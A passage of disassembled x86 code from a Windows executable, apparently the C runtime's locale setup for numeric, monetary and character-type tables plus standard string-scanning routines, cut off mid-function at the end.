mov edx, [ebp+arg_0]
mov eax, [edx+7Ch]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+80h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+84h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+88h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+8Ch]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+90h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+94h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+98h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+9Ch]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+0A0h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+0A4h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+0A8h]
push ecx
call sub_4174C0
add esp, 8
loc_42A0F9: ; CODE XREF: sub_429DF0+9�j
pop ebp
retn
sub_429DF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A100 proc near ; DATA XREF: .data:004434C8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
xor eax, eax
mov ax, word_4922FE
mov [ebp+var_4], eax
cmp dword_492178, 0
jz loc_42A27A
push offset dword_4922CC
push 0Eh
mov ecx, [ebp+var_4]
push ecx
push 1
call sub_42F050
add esp, 10h
mov edx, [ebp+var_8]
or edx, eax
mov [ebp+var_8], edx
push offset dword_4922D0
push 0Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
push offset dword_4922D4
push 10h
mov edx, [ebp+var_4]
push edx
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, dword_4922D4
push edx
call sub_42A3B0
add esp, 4
cmp [ebp+var_8], 0
jz short loc_42A1E9
push 2
mov eax, dword_4922CC
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, dword_4922D0
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, dword_4922D4
push edx
call sub_4174C0
add esp, 8
mov dword_4922CC, 0
mov dword_4922D0, 0
mov dword_4922D4, 0
or eax, 0FFFFFFFFh
jmp loc_42A3A2
; ---------------------------------------------------------------------------
loc_42A1E9: ; CODE XREF: sub_42A100+8F�j
mov eax, off_4440D0
cmp dword ptr [eax], offset dword_444098
jz short loc_42A230
push 2
mov ecx, off_4440D0
mov edx, [ecx]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, off_4440D0
mov ecx, [eax+4]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, off_4440D0
mov eax, [edx+8]
push eax
call sub_4174C0
add esp, 8
loc_42A230: ; CODE XREF: sub_42A100+F4�j
mov ecx, off_4440D0
mov edx, dword_4922CC
mov [ecx], edx
mov eax, off_4440D0
mov ecx, dword_4922D0
mov [eax+4], ecx
mov edx, off_4440D0
mov eax, dword_4922D4
mov [edx+8], eax
mov ecx, off_4440D0
mov edx, [ecx]
mov al, [edx]
mov byte_442F5C, al
mov dword_442F60, 1
xor eax, eax
jmp loc_42A3A2
; ---------------------------------------------------------------------------
loc_42A27A: ; CODE XREF: sub_42A100+1F�j
push 2
mov ecx, dword_4922CC
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, dword_4922D0
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, dword_4922D4
push eax
call sub_4174C0
add esp, 8
mov dword_4922CC, 0
mov dword_4922D0, 0
mov dword_4922D4, 0
push 88h
push offset aInitnum_c ; "initnum.c"
push 2
push 2
call sub_416A30
add esp, 10h
mov ecx, off_4440D0
mov [ecx], eax
mov edx, off_4440D0
cmp dword ptr [edx], 0
jnz short loc_42A2FB
or eax, 0FFFFFFFFh
jmp loc_42A3A2
; ---------------------------------------------------------------------------
loc_42A2FB: ; CODE XREF: sub_42A100+1F1�j
push offset a__3 ; "."
mov eax, off_4440D0
mov ecx, [eax]
push ecx
call sub_419FA0
add esp, 8
push 8Dh
push offset aInitnum_c ; "initnum.c"
push 2
push 2
call sub_416A30
add esp, 10h
mov edx, off_4440D0
mov [edx+4], eax
mov eax, off_4440D0
cmp dword ptr [eax+4], 0
jnz short loc_42A33F
or eax, 0FFFFFFFFh
jmp short loc_42A3A2
; ---------------------------------------------------------------------------
loc_42A33F: ; CODE XREF: sub_42A100+238�j
mov ecx, off_4440D0
mov edx, [ecx+4]
mov byte ptr [edx], 0
push 92h
push offset aInitnum_c ; "initnum.c"
push 2
push 2
call sub_416A30
add esp, 10h
mov ecx, off_4440D0
mov [ecx+8], eax
mov edx, off_4440D0
cmp dword ptr [edx+8], 0
jnz short loc_42A37B
or eax, 0FFFFFFFFh
jmp short loc_42A3A2
; ---------------------------------------------------------------------------
loc_42A37B: ; CODE XREF: sub_42A100+274�j
mov eax, off_4440D0
mov ecx, [eax+8]
mov byte ptr [ecx], 0
mov edx, off_4440D0
mov eax, [edx]
mov cl, [eax]
mov byte_442F5C, cl
mov dword_442F60, 1
xor eax, eax
loc_42A3A2: ; CODE XREF: sub_42A100+E4�j
; sub_42A100+175�j ...
mov esp, ebp
pop ebp
retn
sub_42A100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A3B0 proc near ; CODE XREF: sub_42A100+83�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
loc_42A3B4: ; CODE XREF: sub_42A3B0:loc_42A427�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42A429
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
cmp eax, 30h
jl short loc_42A3ED
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 39h
jg short loc_42A3ED
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
sub ecx, 30h
mov edx, [ebp+arg_0]
mov [edx], cl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_42A427
; ---------------------------------------------------------------------------
loc_42A3ED: ; CODE XREF: sub_42A3B0+17�j
; sub_42A3B0+22�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 3Bh
jnz short loc_42A41E
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_42A3FE: ; CODE XREF: sub_42A3B0+6A�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov al, [edx+1]
mov [ecx], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_42A3FE
jmp short loc_42A427
; ---------------------------------------------------------------------------
loc_42A41E: ; CODE XREF: sub_42A3B0+46�j
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_42A427: ; CODE XREF: sub_42A3B0+3B�j
; sub_42A3B0+6C�j
jmp short loc_42A3B4
; ---------------------------------------------------------------------------
loc_42A429: ; CODE XREF: sub_42A3B0+C�j
mov esp, ebp
pop ebp
retn
sub_42A3B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A430 proc near ; DATA XREF: .data:004434BC�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp dword_492174, 0
jz loc_42A4FC
push 4Ah
push offset aInitmon_c ; "initmon.c"
push 2
push 30h
push 1
call sub_416E40
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_42A469
mov eax, 1
jmp loc_42A55C
; ---------------------------------------------------------------------------
loc_42A469: ; CODE XREF: sub_42A430+2D�j
mov eax, [ebp+var_4]
push eax
call sub_42A560
add esp, 4
test eax, eax
jz short loc_42A49D
mov ecx, [ebp+var_4]
push ecx
call sub_42A7F0
add esp, 4
push 2
mov edx, [ebp+var_4]
push edx
call sub_4174C0
add esp, 8
mov eax, 1
jmp loc_42A55C
; ---------------------------------------------------------------------------
loc_42A49D: ; CODE XREF: sub_42A430+47�j
mov eax, [ebp+var_4]
mov ecx, off_4440D0
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_4]
mov ecx, off_4440D0
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov ecx, off_4440D0
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_4]
mov off_4440D0, eax
mov ecx, dword_4922D8
push ecx
call sub_42A7F0
add esp, 4
push 2
mov edx, dword_4922D8
push edx
call sub_4174C0
add esp, 8
mov eax, [ebp+var_4]
mov dword_4922D8, eax
xor eax, eax
jmp short loc_42A55C
; ---------------------------------------------------------------------------
loc_42A4FC: ; CODE XREF: sub_42A430+B�j
mov ecx, off_4440D0
mov edx, [ecx]
mov off_4440A0, edx
mov eax, off_4440D0
mov ecx, [eax+4]
mov off_4440A4, ecx
mov edx, off_4440D0
mov eax, [edx+8]
mov off_4440A8, eax
mov off_4440D0, offset off_4440A0
mov ecx, dword_4922D8
push ecx
call sub_42A7F0
add esp, 4
push 2
mov edx, dword_4922D8
push edx
call sub_4174C0
add esp, 8
mov dword_4922D8, 0
xor eax, eax
loc_42A55C: ; CODE XREF: sub_42A430+34�j
; sub_42A430+68�j ...
mov esp, ebp
pop ebp
retn
sub_42A430 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A560 proc near ; CODE XREF: sub_42A430+3D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
xor eax, eax
mov ax, word_4922F8
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0
jnz short loc_42A586
or eax, 0FFFFFFFFh
jmp loc_42A769
; ---------------------------------------------------------------------------
loc_42A586: ; CODE XREF: sub_42A560+1C�j
mov ecx, [ebp+arg_0]
add ecx, 0Ch
push ecx
push 15h
mov edx, [ebp+var_4]
push edx
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 10h
push edx
push 14h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 14h
push edx
push 16h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 18h
push edx
push 17h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 1Ch
push edx
push 18h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
push eax
call sub_42A770
add esp, 4
mov ecx, [ebp+arg_0]
add ecx, 20h
push ecx
push 50h
mov edx, [ebp+var_4]
push edx
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 24h
push edx
push 51h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 28h
push edx
push 1Ah
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 29h
push edx
push 19h
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Ah
push edx
push 54h
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Bh
push edx
push 55h
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Ch
push edx
push 56h
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Dh
push edx
push 57h
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Eh
push edx
push 52h
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Fh
push edx
push 53h
mov eax, [ebp+var_4]
push eax
push 0
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
loc_42A769: ; CODE XREF: sub_42A560+21�j
mov esp, ebp
pop ebp
retn
sub_42A560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A770 proc near ; CODE XREF: sub_42A560+C8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
loc_42A774: ; CODE XREF: sub_42A770:loc_42A7E7�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42A7E9
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
cmp eax, 30h
jl short loc_42A7AD
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 39h
jg short loc_42A7AD
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
sub ecx, 30h
mov edx, [ebp+arg_0]
mov [edx], cl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_42A7E7
; ---------------------------------------------------------------------------
loc_42A7AD: ; CODE XREF: sub_42A770+17�j
; sub_42A770+22�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 3Bh
jnz short loc_42A7DE
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_42A7BE: ; CODE XREF: sub_42A770+6A�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov al, [edx+1]
mov [ecx], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_42A7BE
jmp short loc_42A7E7
; ---------------------------------------------------------------------------
loc_42A7DE: ; CODE XREF: sub_42A770+46�j
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_42A7E7: ; CODE XREF: sub_42A770+3B�j
; sub_42A770+6C�j
jmp short loc_42A774
; ---------------------------------------------------------------------------
loc_42A7E9: ; CODE XREF: sub_42A770+C�j
mov esp, ebp
pop ebp
retn
sub_42A770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A7F0 proc near ; CODE XREF: sub_42A430+4D�p
; sub_42A430+A7�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_42A7FE
jmp loc_42A881
; ---------------------------------------------------------------------------
loc_42A7FE: ; CODE XREF: sub_42A7F0+7�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+0Ch], offset dword_4923F8
jz short loc_42A881
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+18h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+20h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
call sub_4174C0
add esp, 8
loc_42A881: ; CODE XREF: sub_42A7F0+9�j
; sub_42A7F0+18�j
pop ebp
retn
sub_42A7F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A890 proc near ; DATA XREF: .data:004434B0�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
push ebp
mov ebp, esp
sub esp, 30h
mov [ebp+var_2C], 0
mov [ebp+var_28], 0
cmp dword_492170, 0
jz loc_42ABE1
cmp dword_492180, 0
jnz short loc_42A8E0
push offset dword_492180
push 1004h
xor eax, eax
mov ax, word_4922F0
push eax
push 0
call sub_42F050
add esp, 10h
test eax, eax
jz short loc_42A8E0
jmp loc_42ABA2
; ---------------------------------------------------------------------------
loc_42A8E0: ; CODE XREF: sub_42A890+28�j
; sub_42A890+49�j
push 5Ch
push offset aInitctyp_c ; "initctyp.c"
push 2
push 202h
call sub_416A30
add esp, 10h
mov [ebp+var_30], eax
push 5Eh
push offset aInitctyp_c ; "initctyp.c"
push 2
push 202h
call sub_416A30
add esp, 10h
mov [ebp+var_1C], eax
push 60h
push offset aInitctyp_c ; "initctyp.c"
push 2
push 101h
call sub_416A30
add esp, 10h
mov [ebp+var_2C], eax
push 62h
push offset aInitctyp_c ; "initctyp.c"
push 2
push 202h
call sub_416A30
add esp, 10h
mov [ebp+var_28], eax
cmp [ebp+var_30], 0
jz short loc_42A95C
cmp [ebp+var_1C], 0
jz short loc_42A95C
cmp [ebp+var_2C], 0
jz short loc_42A95C
cmp [ebp+var_28], 0
jnz short loc_42A961
loc_42A95C: ; CODE XREF: sub_42A890+B8�j
; sub_42A890+BE�j ...
jmp loc_42ABA2
; ---------------------------------------------------------------------------
loc_42A961: ; CODE XREF: sub_42A890+CA�j
mov ecx, [ebp+var_2C]
mov [ebp+var_18], ecx
mov [ebp+var_20], 0
jmp short loc_42A979
; ---------------------------------------------------------------------------
loc_42A970: ; CODE XREF: sub_42A890+103�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_42A979: ; CODE XREF: sub_42A890+DE�j
cmp [ebp+var_20], 100h
jge short loc_42A995
mov eax, [ebp+var_18]
mov cl, byte ptr [ebp+var_20]
mov [eax], cl
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
jmp short loc_42A970
; ---------------------------------------------------------------------------
loc_42A995: ; CODE XREF: sub_42A890+F0�j
lea eax, [ebp+var_14]
push eax
mov ecx, dword_492180
push ecx
call ds:dword_49447C
test eax, eax
jnz short loc_42A9AF
jmp loc_42ABA2
; ---------------------------------------------------------------------------
loc_42A9AF: ; CODE XREF: sub_42A890+118�j
cmp [ebp+var_14], 2
jbe short loc_42A9BA
jmp loc_42ABA2
; ---------------------------------------------------------------------------
loc_42A9BA: ; CODE XREF: sub_42A890+123�j
mov edx, [ebp+var_14]
and edx, 0FFFFh
mov dword_442F58, edx
cmp dword_442F58, 1
jle short loc_42AA29
lea eax, [ebp+var_E]
mov [ebp+var_18], eax
jmp short loc_42A9E3
; ---------------------------------------------------------------------------
loc_42A9DA: ; CODE XREF: sub_42A890:loc_42AA27�j
mov ecx, [ebp+var_18]
add ecx, 2
mov [ebp+var_18], ecx
loc_42A9E3: ; CODE XREF: sub_42A890+148�j
mov edx, [ebp+var_18]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_42AA29
mov ecx, [ebp+var_18]
xor edx, edx
mov dl, [ecx+1]
test edx, edx
jz short loc_42AA29
mov eax, [ebp+var_18]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
jmp short loc_42AA0F
; ---------------------------------------------------------------------------
loc_42AA06: ; CODE XREF: sub_42A890+195�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_42AA0F: ; CODE XREF: sub_42A890+174�j
mov eax, [ebp+var_18]
xor ecx, ecx
mov cl, [eax+1]
cmp [ebp+var_20], ecx
jg short loc_42AA27
mov edx, [ebp+var_2C]
add edx, [ebp+var_20]
mov byte ptr [edx], 0
jmp short loc_42AA06
; ---------------------------------------------------------------------------
loc_42AA27: ; CODE XREF: sub_42A890+18A�j
jmp short loc_42A9DA
; ---------------------------------------------------------------------------
loc_42AA29: ; CODE XREF: sub_42A890+140�j
; sub_42A890+15C�j ...
push 0
push 0
push 0
mov eax, [ebp+var_30]
add eax, 2
push eax
push 100h
mov ecx, [ebp+var_2C]
push ecx
push 1
call sub_426F40
add esp, 1Ch
test eax, eax
jnz short loc_42AA52
jmp loc_42ABA2
; ---------------------------------------------------------------------------
loc_42AA52: ; CODE XREF: sub_42A890+1BB�j
mov edx, [ebp+var_30]
mov word ptr [edx], 0
mov eax, [ebp+var_28]
mov [ebp+var_24], eax
mov [ebp+var_20], 0
jmp short loc_42AA72
; ---------------------------------------------------------------------------
loc_42AA69: ; CODE XREF: sub_42A890+1FE�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
loc_42AA72: ; CODE XREF: sub_42A890+1D7�j
cmp [ebp+var_20], 100h
jge short loc_42AA90
mov edx, [ebp+var_24]
mov ax, word ptr [ebp+var_20]
mov [edx], ax
mov ecx, [ebp+var_24]
add ecx, 2
mov [ebp+var_24], ecx
jmp short loc_42AA69
; ---------------------------------------------------------------------------
loc_42AA90: ; CODE XREF: sub_42A890+1E9�j
push 0
push 0
mov edx, [ebp+var_1C]
add edx, 2
push edx
push 100h
mov eax, [ebp+var_28]
push eax
push 1
call sub_42F2F0
add esp, 18h
test eax, eax
jnz short loc_42AAB7
jmp loc_42ABA2
; ---------------------------------------------------------------------------
loc_42AAB7: ; CODE XREF: sub_42A890+220�j
mov ecx, [ebp+var_1C]
mov word ptr [ecx], 0
cmp dword_442F58, 1
jle short loc_42AB23
lea edx, [ebp+var_E]
mov [ebp+var_18], edx
jmp short loc_42AAD9
; ---------------------------------------------------------------------------
loc_42AAD0: ; CODE XREF: sub_42A890:loc_42AB21�j
mov eax, [ebp+var_18]
add eax, 2
mov [ebp+var_18], eax
loc_42AAD9: ; CODE XREF: sub_42A890+23E�j
mov ecx, [ebp+var_18]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_42AB23
mov eax, [ebp+var_18]
xor ecx, ecx
mov cl, [eax+1]
test ecx, ecx
jz short loc_42AB23
mov edx, [ebp+var_18]
xor eax, eax
mov al, [edx]
mov [ebp+var_20], eax
jmp short loc_42AB05
; ---------------------------------------------------------------------------
loc_42AAFC: ; CODE XREF: sub_42A890+28F�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
loc_42AB05: ; CODE XREF: sub_42A890+26A�j
mov edx, [ebp+var_18]
xor eax, eax
mov al, [edx+1]
cmp [ebp+var_20], eax
jg short loc_42AB21
mov ecx, [ebp+var_20]
mov edx, [ebp+var_30]
mov word ptr [edx+ecx*2+2], 8000h
jmp short loc_42AAFC
; ---------------------------------------------------------------------------
loc_42AB21: ; CODE XREF: sub_42A890+280�j
jmp short loc_42AAD0
; ---------------------------------------------------------------------------
loc_42AB23: ; CODE XREF: sub_42A890+236�j
; sub_42A890+252�j ...
mov eax, [ebp+var_30]
add eax, 2
mov off_442D4C, eax
mov ecx, [ebp+var_1C]
add ecx, 2
mov off_442D50, ecx
cmp dword_4922DC, 0
jz short loc_42AB54
push 2
mov edx, dword_4922DC
push edx
call sub_4174C0
add esp, 8
loc_42AB54: ; CODE XREF: sub_42A890+2B1�j
mov eax, [ebp+var_30]
mov dword_4922DC, eax
cmp dword_4922E0, 0
jz short loc_42AB76
push 2
mov ecx, dword_4922E0
push ecx
call sub_4174C0
add esp, 8
loc_42AB76: ; CODE XREF: sub_42A890+2D3�j
mov edx, [ebp+var_1C]
mov dword_4922E0, edx
push 2
mov eax, [ebp+var_2C]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+var_28]
push ecx
call sub_4174C0
add esp, 8
xor eax, eax
jmp loc_42AC2C
; ---------------------------------------------------------------------------
loc_42ABA2: ; CODE XREF: sub_42A890+4B�j
; sub_42A890:loc_42A95C�j ...
push 2
mov edx, [ebp+var_30]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+var_1C]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+var_2C]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+var_28]
push edx
call sub_4174C0
add esp, 8
mov eax, 1
jmp short loc_42AC2C
; ---------------------------------------------------------------------------
loc_42ABE1: ; CODE XREF: sub_42A890+1B�j
mov off_442D4C, offset word_442D56
mov off_442D50, offset word_442D56
push 2
mov eax, dword_4922DC
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, dword_4922E0
push ecx
call sub_4174C0
add esp, 8
mov dword_4922DC, 0
mov dword_4922E0, 0
xor eax, eax
loc_42AC2C: ; CODE XREF: sub_42A890+30D�j
; sub_42A890+34F�j
mov esp, ebp
pop ebp
retn
sub_42A890 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AC30 proc near ; DATA XREF: .data:004434A4�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_42AC30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AC40 proc near ; CODE XREF: .text:0042346E�p
; sub_423B20+7B�p
var_24 = dword ptr -24h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+arg_4]
lea ecx, [ecx+0]
loc_42AC54: ; CODE XREF: sub_42AC40+1F�j
mov al, [edx]
or al, al
jz short loc_42AC61
inc edx
bts [esp+24h+var_24], eax
jmp short loc_42AC54
; ---------------------------------------------------------------------------
loc_42AC61: ; CODE XREF: sub_42AC40+18�j
mov esi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
nop
loc_42AC68: ; CODE XREF: sub_42AC40+34�j
inc ecx
mov al, [esi]
or al, al
jz short loc_42AC76
inc esi
bt [esp+24h+var_24], eax
jnb short loc_42AC68
loc_42AC76: ; CODE XREF: sub_42AC40+2D�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
sub_42AC40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AC80 proc near ; CODE XREF: .text:0042338D�p
var_24 = dword ptr -24h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+arg_4]
lea ecx, [ecx+0]
loc_42AC94: ; CODE XREF: sub_42AC80+1F�j
mov al, [edx]
or al, al
jz short loc_42ACA1
inc edx
bts [esp+24h+var_24], eax
jmp short loc_42AC94
; ---------------------------------------------------------------------------
loc_42ACA1: ; CODE XREF: sub_42AC80+18�j
mov esi, [ebp+arg_0]
loc_42ACA4: ; CODE XREF: sub_42AC80+2F�j
mov al, [esi]
or al, al
jz short loc_42ACB4
inc esi
bt [esp+24h+var_24], eax
jnb short loc_42ACA4
lea eax, [esi-1]
loc_42ACB4: ; CODE XREF: sub_42AC80+28�j
add esp, 20h
pop esi
leave
retn
sub_42AC80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ACC0 proc near ; CODE XREF: sub_423930+D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
cmp dword_492328, 0
jnz short loc_42ACF2
call sub_42B790
test eax, eax
jz short loc_42ACE2
mov eax, ds:dword_4943F0
mov [ebp+var_8], eax
jmp short loc_42ACE9
; ---------------------------------------------------------------------------
loc_42ACE2: ; CODE XREF: sub_42ACC0+16�j
mov [ebp+var_8], offset sub_42B7E0
loc_42ACE9: ; CODE XREF: sub_42ACC0+20�j
mov ecx, [ebp+var_8]
mov dword_492328, ecx
